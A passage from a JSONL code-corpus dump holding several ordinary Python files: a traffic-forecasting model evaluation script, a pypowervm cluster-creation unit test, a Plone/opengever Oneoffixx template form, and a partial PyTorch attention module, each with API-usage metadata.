"matplotlib.pyplot.ylabel", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}]} +{"seq_id": "499603482", "text": "import os\nimport sys\nimport torch\nfrom collections import defaultdict\nimport json\nimport pickle\nimport logging\nlogging.basicConfig()\n\nsys.path.append(os.getcwd())\nfrom generalization_config import config\nfrom utils.graph_utils import create_adj_matrix, blockify_A, create_coordinate_channel, \\\n create_edge_index_from_adjacency_matrix\nfrom utils.training_gcn_utils import validate\nfrom utils.training_unet_utils import validate as validate_unet\nfrom utils.videoloader import trafic4cast_dataset\n\n\nfrom models.unet import UNet\nfrom models.graph_models import KipfNet_orig, KipfNet, KipfNetd2, Graph_resnet\n\n\n\ndef get_graphdata_obj(inputs, edge_index, y, num_features=38, num_classes=9):\n graphdata = Data(x=inputs, edge_index=edge_index, y=y)\n\n return graphdata\n\n\ndef get_n_params(model):\n pp = 0\n for p in list(model.parameters()):\n nn = 1\n for s in list(p.size()):\n nn = nn * s\n pp += nn\n return pp\n\n\nif __name__ == \"__main__\":\n print('batch_size: ', config['dataloader']['batch_size'])\n print(config['device_num'])\n device = torch.device(config['device_num'])\n\n model_tuple_list = config['model_tuple_list']\n\n resultdict = defaultdict(dict)\n\n for city in ['Berlin', 'Moscow', 'Istanbul']:\n config['dataset']['cities'] = [city]\n\n dataset_val = trafic4cast_dataset(split_type='validation', **config['dataset'],\n reduce=True, filter_test_times=True)\n\n val_loader = torch.utils.data.DataLoader(dataset_val, shuffle=False,\n **config['dataloader'])\n\n for model_tuple in model_tuple_list:\n model_plot_name = model_tuple[0]\n model_path = model_tuple[1]\n is_graph = model_tuple[2]\n graph_model_name = model_tuple[3]\n\n with open(os.path.join(model_path, 'config.json'), 'r') as f:\n model_config = json.load(f)\n\n adj, nn_ixs, G, mask = create_adj_matrix(city=config['dataset']['cities'][0],\n mask_threshold=config['mask_threshold'])\n\n if not is_graph:\n model_config['model']['batch_norm'] = True\n model = UNet(**model_config['model']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n map_location=device))\n\n mask = torch.from_numpy(mask).to(device)\n\n if 'MIE-Lab' in model_plot_name:\n norm = False\n else:\n norm = True\n\n val_loss = validate_unet(model=model, val_loader=val_loader, device=device, mask=mask,\n config=model_config, print_loss=False, norm=norm)\n\n if is_graph:\n\n n_features = 38\n batch_size = config['dataloader']['batch_size']\n assert batch_size == 1, \"batch_size should be 1 for graphs\"\n\n coords = create_coordinate_channel(b=batch_size)\n\n if config['dataloader']['batch_size'] > 1:\n adj = blockify_A(adj, config['dataloader']['batch_size'])\n\n edge_index = create_edge_index_from_adjacency_matrix(adj)\n edge_index = edge_index.to(device)\n\n if graph_model_name == 'kipfnet':\n model = KipfNet_orig(num_features=n_features,\n num_classes=9, **model_config['model']['KIPF']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n map_location=device))\n\n elif graph_model_name == 'skipfnet':\n model = KipfNet(num_features=n_features,\n num_classes=9, **model_config['model']['KipfNet']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n map_location=device))\n\n elif graph_model_name == 'skipfnet2d':\n model = KipfNetd2(num_features=n_features,\n num_classes=9, **model_config['model']['KipfNetd2']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n map_location=device))\n\n elif graph_model_name == 'Graph_resnet':\n model = Graph_resnet(num_features=n_features,\n num_classes=9, **model_config['model']['Graph_resnet']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n map_location=device))\n\n mask = None\n val_loss = validate(model=model, val_loader=val_loader, device=device,\n adj=adj, nn_ixs=nn_ixs, edge_index=edge_index, coords=coords,\n mask=mask, batch_size=batch_size, print_loss=False)\n\n print(\"Validation loss {}: {} = {:.2f}\".format(city, model_plot_name, val_loss))\n resultdict[model_plot_name][city] = val_loss\n\n nb_params = get_n_params(model)\n resultdict[model_plot_name]['nb_params'] = nb_params\n\n pickle.dump(resultdict, open(os.path.join('.', 'output', 'data_generalization.p'), 'wb'))\n", "sub_path": "experiment/generalization.py", "file_name": "generalization.py", "file_ext": "py", "file_size_in_byte": 5807, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.basicConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 10, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 41, "usage_type": "name"}, {"api_name": "generalization_config.config", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 43, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 43, "usage_type": "name"}, {"api_name": "generalization_config.config", "line_number": 45, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 47, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 50, "usage_type": "name"}, {"api_name": "utils.videoloader.trafic4cast_dataset", "line_number": 52, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 55, "usage_type": "attribute"}, {"api_name": "generalization_config.config", "line_number": 56, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 65, "usage_type": "call"}, {"api_name": "utils.graph_utils.create_adj_matrix", "line_number": 67, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 67, "usage_type": "name"}, {"api_name": "generalization_config.config", "line_number": 68, "usage_type": "name"}, {"api_name": "models.unet.UNet", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 76, "usage_type": "call"}, {"api_name": "utils.training_unet_utils.validate", "line_number": 83, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 89, "usage_type": "name"}, {"api_name": "utils.graph_utils.create_coordinate_channel", "line_number": 92, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 94, "usage_type": "name"}, {"api_name": "utils.graph_utils.blockify_A", "line_number": 95, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 95, "usage_type": "name"}, {"api_name": "utils.graph_utils.create_edge_index_from_adjacency_matrix", "line_number": 97, "usage_type": "call"}, {"api_name": "models.graph_models.KipfNet_orig", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "models.graph_models.KipfNet", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.graph_models.KipfNetd2", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "models.graph_models.Graph_resnet", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "utils.training_gcn_utils.validate", "line_number": 125, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path", "line_number": 135, "usage_type": "attribute"}]} +{"seq_id": "252197386", "text": "# Copyright 2015 IBM Corp.\n#\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport unittest\n\nimport mock\n\nimport pypowervm.entities as ent\nimport pypowervm.tasks.cluster_ssp as cs\nimport pypowervm.tests.tasks.util as tju\nimport pypowervm.util as u\nimport pypowervm.wrappers.cluster as clust\nimport pypowervm.wrappers.job as jwrap\nimport pypowervm.wrappers.storage as stor\n\nCREATE_CLUSTER = 'cluster_create_job_template.txt'\n\n\nclass TestClusterSSP(unittest.TestCase):\n\n @mock.patch('pypowervm.wrappers.job.Job.delete_job')\n @mock.patch('pypowervm.wrappers.job.Job._monitor_job')\n @mock.patch('pypowervm.wrappers.job.Job.job_status')\n @mock.patch('pypowervm.adapter.Adapter')\n def test_crt_cluster_ssp(self, mock_adp, mock_status, mock_monitor_job,\n mock_del_job):\n # Load up GET Cluster/do/Create (job template)\n mock_adp.read.return_value = tju.load_file(CREATE_CLUSTER, mock_adp)\n # We'll pretend the job ran and completed successfully\n mock_monitor_job.return_value = False\n mock_status.__get__ = mock.Mock(\n return_value=jwrap.JobStatus.COMPLETED_OK)\n\n # Mock Job.create_job to check job parameter values\n def create_job(job_el, entry_type, *args, **kwargs):\n self.assertEqual(entry_type, clust.Cluster.schema_type)\n job = jwrap.Job.wrap(ent.Entry({}, job_el, None))\n param_vals = job._get_vals(u.xpath(\n 'JobParameters', 'JobParameter', 'ParameterValue'))\n self.assertEqual(\n param_vals[0],\n 'clust_namerepos_pv_namevios15XXXXYYYZZZZZZZ')\n self.assertEqual(\n param_vals[1],\n '<'\n 'uom:Metadata>hdisk1'\n 'hdisk2hdisk3ssp'\n '_name')\n return mock.MagicMock()\n mock_adp.create_job.side_effect = create_job\n node = clust.Node.bld(\n mock_adp, hostname='vios1', lpar_id=5, mtms='XXXX-YYY*ZZZZZZZ',\n vios_uri='https://a.example.com:12443/rest/api/uom/VirtualIOServe'\n 'r/12345678-1234-1234-1234-123456789012')\n repos = stor.PV.bld(mock_adp, name='repos_pv_name')\n data = [stor.PV.bld(mock_adp, name=n) for n in (\n 'hdisk1', 'hdisk2', 'hdisk3')]\n cs.crt_cluster_ssp('clust_name', 'ssp_name', repos, node, data)\n # run_job() should run delete_job() at the end\n self.assertEqual(mock_del_job.call_count, 1)\n", "sub_path": "pypowervm/tests/tasks/test_cluster_ssp.py", "file_name": "test_cluster_ssp.py", "file_ext": "py", "file_size_in_byte": 5123, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "unittest.TestCase", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pypowervm.tests.tasks.util.load_file", "line_number": 41, "usage_type": "call"}, {"api_name": "pypowervm.tests.tasks.util", "line_number": 41, "usage_type": "name"}, {"api_name": "mock.Mock", "line_number": 44, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.job.JobStatus", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.job", "line_number": 45, "usage_type": "name"}, {"api_name": "pypowervm.wrappers.cluster.Cluster", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.cluster", "line_number": 49, "usage_type": "name"}, {"api_name": "pypowervm.wrappers.job.Job.wrap", "line_number": 50, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.job.Job", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.job", "line_number": 50, "usage_type": "name"}, {"api_name": "pypowervm.entities.Entry", "line_number": 50, "usage_type": "call"}, {"api_name": "pypowervm.entities", "line_number": 50, "usage_type": "name"}, {"api_name": "pypowervm.util.xpath", "line_number": 51, "usage_type": "call"}, {"api_name": "pypowervm.util", "line_number": 51, "usage_type": "name"}, {"api_name": "mock.MagicMock", "line_number": 86, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.cluster.Node.bld", "line_number": 88, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.cluster.Node", "line_number": 88, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.cluster", "line_number": 88, "usage_type": "name"}, {"api_name": "pypowervm.wrappers.storage.PV.bld", "line_number": 92, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.storage.PV", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.storage", "line_number": 92, "usage_type": "name"}, {"api_name": "pypowervm.wrappers.storage.PV.bld", "line_number": 93, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.storage.PV", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.storage", "line_number": 93, "usage_type": "name"}, {"api_name": "pypowervm.tasks.cluster_ssp.crt_cluster_ssp", "line_number": 95, "usage_type": "call"}, {"api_name": "pypowervm.tasks.cluster_ssp", "line_number": 95, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 34, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 35, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 36, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "111741236", "text": "from copy import deepcopy\nfrom opengever.base.schema import TableChoice\nfrom opengever.oneoffixx import _\nfrom opengever.oneoffixx.api_client import OneoffixxAPIClient\nfrom opengever.oneoffixx.command import CreateDocumentFromOneOffixxTemplateCommand\nfrom opengever.oneoffixx.utils import whitelisted_template_types\nfrom plone.i18n.normalizer.interfaces import IFileNameNormalizer\nfrom plone.supermodel import model\nfrom plone.z3cform.layout import FormWrapper\nfrom z3c.form import button\nfrom z3c.form.field import Fields\nfrom z3c.form.form import Form\nfrom zope import schema\nfrom zope.component import getUtility\nfrom zope.i18n import translate\nfrom zope.interface import provider\nfrom zope.schema.interfaces import IContextSourceBinder\nfrom zope.schema.vocabulary import SimpleVocabulary\n\n\ndef get_oneoffixx_favorites():\n \"\"\"Return the user chosen favorites as a template group, if any.\"\"\"\n api_client = OneoffixxAPIClient()\n favorites = api_client.get_oneoffixx_favorites()\n if favorites.get('templates'):\n return favorites\n return None\n\n\ndef get_oneoffixx_template_groups():\n \"\"\"Return the template groups.\n\n Potentially amended with user chosen favorites.\n \"\"\"\n api_client = OneoffixxAPIClient()\n # We need to work on a copy to not pollute the cached one\n template_groups = deepcopy(api_client.get_oneoffixx_template_groups())\n favorites = get_oneoffixx_favorites()\n if favorites:\n template_groups.insert(0, favorites)\n return template_groups\n\n\ndef get_oneoffixx_templates():\n \"\"\"Return all oneoffixx templates.\n\n We do not want duplicates from favorites here.\n \"\"\"\n api_client = OneoffixxAPIClient()\n return (\n OneOffixxTemplate(template, template_group.get('localizedName', ''))\n for template_group in api_client.get_oneoffixx_template_groups()\n for template in template_group.get(\"templates\")\n if template.get('metaTemplateId') in whitelisted_template_types\n )\n\n\ndef default_template_group():\n \"\"\"Return all templates, or the user favorites, if defined by user.\"\"\"\n favorites = get_oneoffixx_favorites()\n if favorites:\n return favorites.get('id')\n return None\n\n\n@provider(IContextSourceBinder)\ndef list_templates(context):\n \"\"\"Return a list available templates.\"\"\"\n templates = get_oneoffixx_templates()\n template_group = context.REQUEST.form.get('form.widgets.template_group')\n terms = []\n\n for template in templates:\n terms.append(SimpleVocabulary.createTerm(\n template, template.template_id, template.title))\n\n # We filter templates when template_group has been selected\n if template_group is not None:\n favorites = get_oneoffixx_favorites()\n # Favorites are a special case\n if favorites and template_group[0] == favorites.get('id'):\n terms = [\n SimpleVocabulary.createTerm(\n OneOffixxTemplate(\n template, favorites.get('localizedName', '')),\n template.get('id'),\n template.get('localizedName'),\n )\n for template in favorites.get('templates')\n ]\n elif template_group[0] != '--NOVALUE--':\n terms = [term for term in terms if term.value.group == template_group[0]]\n\n return MutableObjectVocabulary(terms)\n\n\n@provider(IContextSourceBinder)\ndef list_template_groups(context):\n \"\"\"Return the list of available template groups.\"\"\"\n template_groups = get_oneoffixx_template_groups()\n terms = []\n for group in template_groups:\n terms.append(SimpleVocabulary.createTerm(group.get(\"id\"),\n group.get(\"id\"),\n group.get(\"localizedName\")))\n return MutableObjectVocabulary(terms)\n\n\nclass OneOffixxTemplate(object):\n\n def __init__(self, template, groupname):\n self.title = template.get(\"localizedName\")\n self.template_id = template.get(\"id\")\n self.group = template.get('templateGroupId')\n self.groupname = groupname\n template_type = template['metaTemplateId']\n template_type_info = whitelisted_template_types[template_type]\n self.content_type = template_type_info['content-type']\n filename = template.get(\"localizedName\")\n normalizer = getUtility(IFileNameNormalizer, name='gever_filename_normalizer')\n self.filename = normalizer.normalize(filename, extension=template_type_info['extension'])\n self.languages = template.get(\"languages\")\n\n def __eq__(self, other):\n if type(other) == type(self):\n return self.template_id == other.template_id\n return False\n\n\nclass MutableObjectVocabulary(SimpleVocabulary):\n\n def __contains__(self, value):\n try:\n return any([value == val for val in self.by_value])\n except TypeError:\n return False\n\n\nclass ICreateDocumentFromOneOffixxTemplate(model.Schema):\n\n # XXX - this always renders the --NOVALUE-- as the actually chosen\n # default is actually loaded over AJAX - confusing and bad UX\n template_group = schema.Choice(\n title=_(u'label_template_group', default=u'Template group'),\n source=list_template_groups,\n required=False,\n defaultFactory=default_template_group,\n )\n\n template = TableChoice(\n title=_(u\"label_template\", default=u\"Template\"),\n source=list_templates,\n required=True,\n show_filter=True,\n vocabulary_depends_on=['form.widgets.template_group'],\n columns=(\n {'column': 'title',\n 'column_title': _(u'label_title', default=u'Title'),\n 'sort_index': 'sortable_title'},\n )\n )\n\n title = schema.TextLine(\n title=_(u\"label_title\", default=u\"Title\"),\n required=True)\n\n\nclass SelectOneOffixxTemplateDocumentWizardStep(Form):\n\n label = _(u'create_document_with_template', default=u'Create document from template')\n ignoreContext = True\n fields = Fields(ICreateDocumentFromOneOffixxTemplate)\n\n def updateWidgets(self, prefix=None):\n super(SelectOneOffixxTemplateDocumentWizardStep, self).updateWidgets(prefix=prefix)\n self.widgets['template_group'].noValueMessage = translate(\n _(u'label_all_template_groups', default=u'All templates'), context=self.request)\n\n def finish_document_creation(self, data):\n new_doc = self.create_document(data)\n self.activate_external_editing(new_doc)\n return self.request.RESPONSE.redirect(new_doc.absolute_url())\n\n def activate_external_editing(self, new_doc):\n \"\"\"Add the oneoffixx external_editor URL to redirector queue.\"\"\"\n new_doc.setup_external_edit_redirect(self.request, action=\"oneoffixx\")\n\n def create_document(self, data):\n \"\"\"Create a new document based on a template.\"\"\"\n command = CreateDocumentFromOneOffixxTemplateCommand(self.context, data['title'], data['template'])\n return command.execute()\n\n @button.buttonAndHandler(_('button_save', default=u'Save'), name='save')\n def handleApply(self, action):\n data, errors = self.extractData()\n\n if not errors:\n return self.finish_document_creation(data)\n\n self.status = self.formErrorsMessage\n return None\n\n @button.buttonAndHandler(_(u'button_cancel', default=u'Cancel'), name='cancel')\n def cancel(self, action):\n return self.request.RESPONSE.redirect(self.context.absolute_url())\n\n\nclass SelectOneOffixxTemplateDocumentView(FormWrapper):\n\n form = SelectOneOffixxTemplateDocumentWizardStep\n", "sub_path": "opengever/oneoffixx/browser/form.py", "file_name": "form.py", "file_ext": "py", "file_size_in_byte": 7651, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "opengever.oneoffixx.api_client.OneoffixxAPIClient", "line_number": 23, "usage_type": "call"}, {"api_name": "opengever.oneoffixx.api_client.OneoffixxAPIClient", "line_number": 35, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 37, "usage_type": "call"}, {"api_name": "opengever.oneoffixx.api_client.OneoffixxAPIClient", "line_number": 49, "usage_type": "call"}, {"api_name": "opengever.oneoffixx.utils.whitelisted_template_types", "line_number": 54, "usage_type": "name"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary.createTerm", "line_number": 74, "usage_type": "call"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary", "line_number": 74, "usage_type": "name"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary.createTerm", "line_number": 83, "usage_type": "call"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary", "line_number": 83, "usage_type": "name"}, {"api_name": "zope.interface.provider", "line_number": 66, "usage_type": "call"}, {"api_name": "zope.schema.interfaces.IContextSourceBinder", "line_number": 66, "usage_type": "argument"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary.createTerm", "line_number": 103, "usage_type": "call"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary", "line_number": 103, "usage_type": "name"}, {"api_name": "zope.interface.provider", "line_number": 97, "usage_type": "call"}, {"api_name": "zope.schema.interfaces.IContextSourceBinder", "line_number": 97, "usage_type": "argument"}, {"api_name": "opengever.oneoffixx.utils.whitelisted_template_types", "line_number": 117, "usage_type": "name"}, {"api_name": "zope.component.getUtility", "line_number": 120, "usage_type": "call"}, {"api_name": "plone.i18n.normalizer.interfaces.IFileNameNormalizer", "line_number": 120, "usage_type": "argument"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary", "line_number": 130, "usage_type": "name"}, {"api_name": "plone.supermodel.model.Schema", "line_number": 139, "usage_type": "attribute"}, {"api_name": "plone.supermodel.model", "line_number": 139, "usage_type": "name"}, {"api_name": "zope.schema.Choice", "line_number": 143, "usage_type": "call"}, {"api_name": "zope.schema", "line_number": 143, "usage_type": "name"}, {"api_name": "opengever.oneoffixx._", "line_number": 144, "usage_type": "call"}, {"api_name": "opengever.base.schema.TableChoice", "line_number": 150, "usage_type": "call"}, {"api_name": "opengever.oneoffixx._", "line_number": 151, "usage_type": "call"}, {"api_name": "opengever.oneoffixx._", "line_number": 158, "usage_type": "call"}, {"api_name": "zope.schema.TextLine", "line_number": 163, "usage_type": "call"}, {"api_name": "zope.schema", "line_number": 163, "usage_type": "name"}, {"api_name": "opengever.oneoffixx._", "line_number": 164, "usage_type": "call"}, {"api_name": "z3c.form.form.Form", "line_number": 168, "usage_type": "name"}, {"api_name": "opengever.oneoffixx._", "line_number": 170, "usage_type": "call"}, {"api_name": "z3c.form.field.Fields", "line_number": 172, "usage_type": "call"}, {"api_name": "zope.i18n.translate", "line_number": 176, "usage_type": "call"}, {"api_name": "opengever.oneoffixx._", "line_number": 177, "usage_type": "call"}, {"api_name": "opengever.oneoffixx.command.CreateDocumentFromOneOffixxTemplateCommand", "line_number": 190, "usage_type": "call"}, {"api_name": "z3c.form.button.buttonAndHandler", "line_number": 193, "usage_type": "call"}, {"api_name": "z3c.form.button", "line_number": 193, "usage_type": "name"}, {"api_name": "opengever.oneoffixx._", "line_number": 193, "usage_type": "call"}, {"api_name": "z3c.form.button.buttonAndHandler", "line_number": 203, "usage_type": "call"}, {"api_name": "z3c.form.button", "line_number": 203, "usage_type": "name"}, {"api_name": "opengever.oneoffixx._", "line_number": 203, "usage_type": "call"}, {"api_name": "plone.z3cform.layout.FormWrapper", "line_number": 208, "usage_type": "name"}]} +{"seq_id": "125428796", "text": "import pdb\nimport sys\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\nsys.path.append(\"..\")\nfrom utils.misc import ixvr\n\nclass AttendFeedForward(nn.Module):\n\t\"\"\"\n\tSimiliar to the attend (Section 3.1) module of the DecAtt paper\n\t\"\"\"\n\tdef __init__(self, inp_size, hidden_size=200):\n\t\tsuper(AttendFeedForward, self).__init__()\n\n\t\tself.hidden_size = hidden_size\n\t\tself.linear = nn.Sequential( \\\n\t\t\tnn.Linear(inp_size, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size), \\\n\t\t\tnn.Linear(hidden_size, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size))\n\n\tdef forward(self, s1, s2, mask1, mask2):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\ts1: Sentence 1 BiLSTM embeddings (b x LA x inp_size)\n\t\t\ts2: Sentence 2 BiLSTM embeddings (b x LB x inp_size)\n\t\t\tmask1: Sentence 1 mask (b x LA)\n\t\t\tmask2: Sentence 2 mask (b x LB)\n\t\tOutput:\n\t\t\talphas: Soft aligned combinations of s1 w.r.t. s2 tokens (b x maxlen x inp_size)\n\t\t\tbetas: Soft aligned combinations of s2 w.r.t. s1 tokens (b x maxlen x inp_size)\n\t\t\"\"\"\n\t\tbatch_size = s1.shape[0]\n\t\tmaxlen = 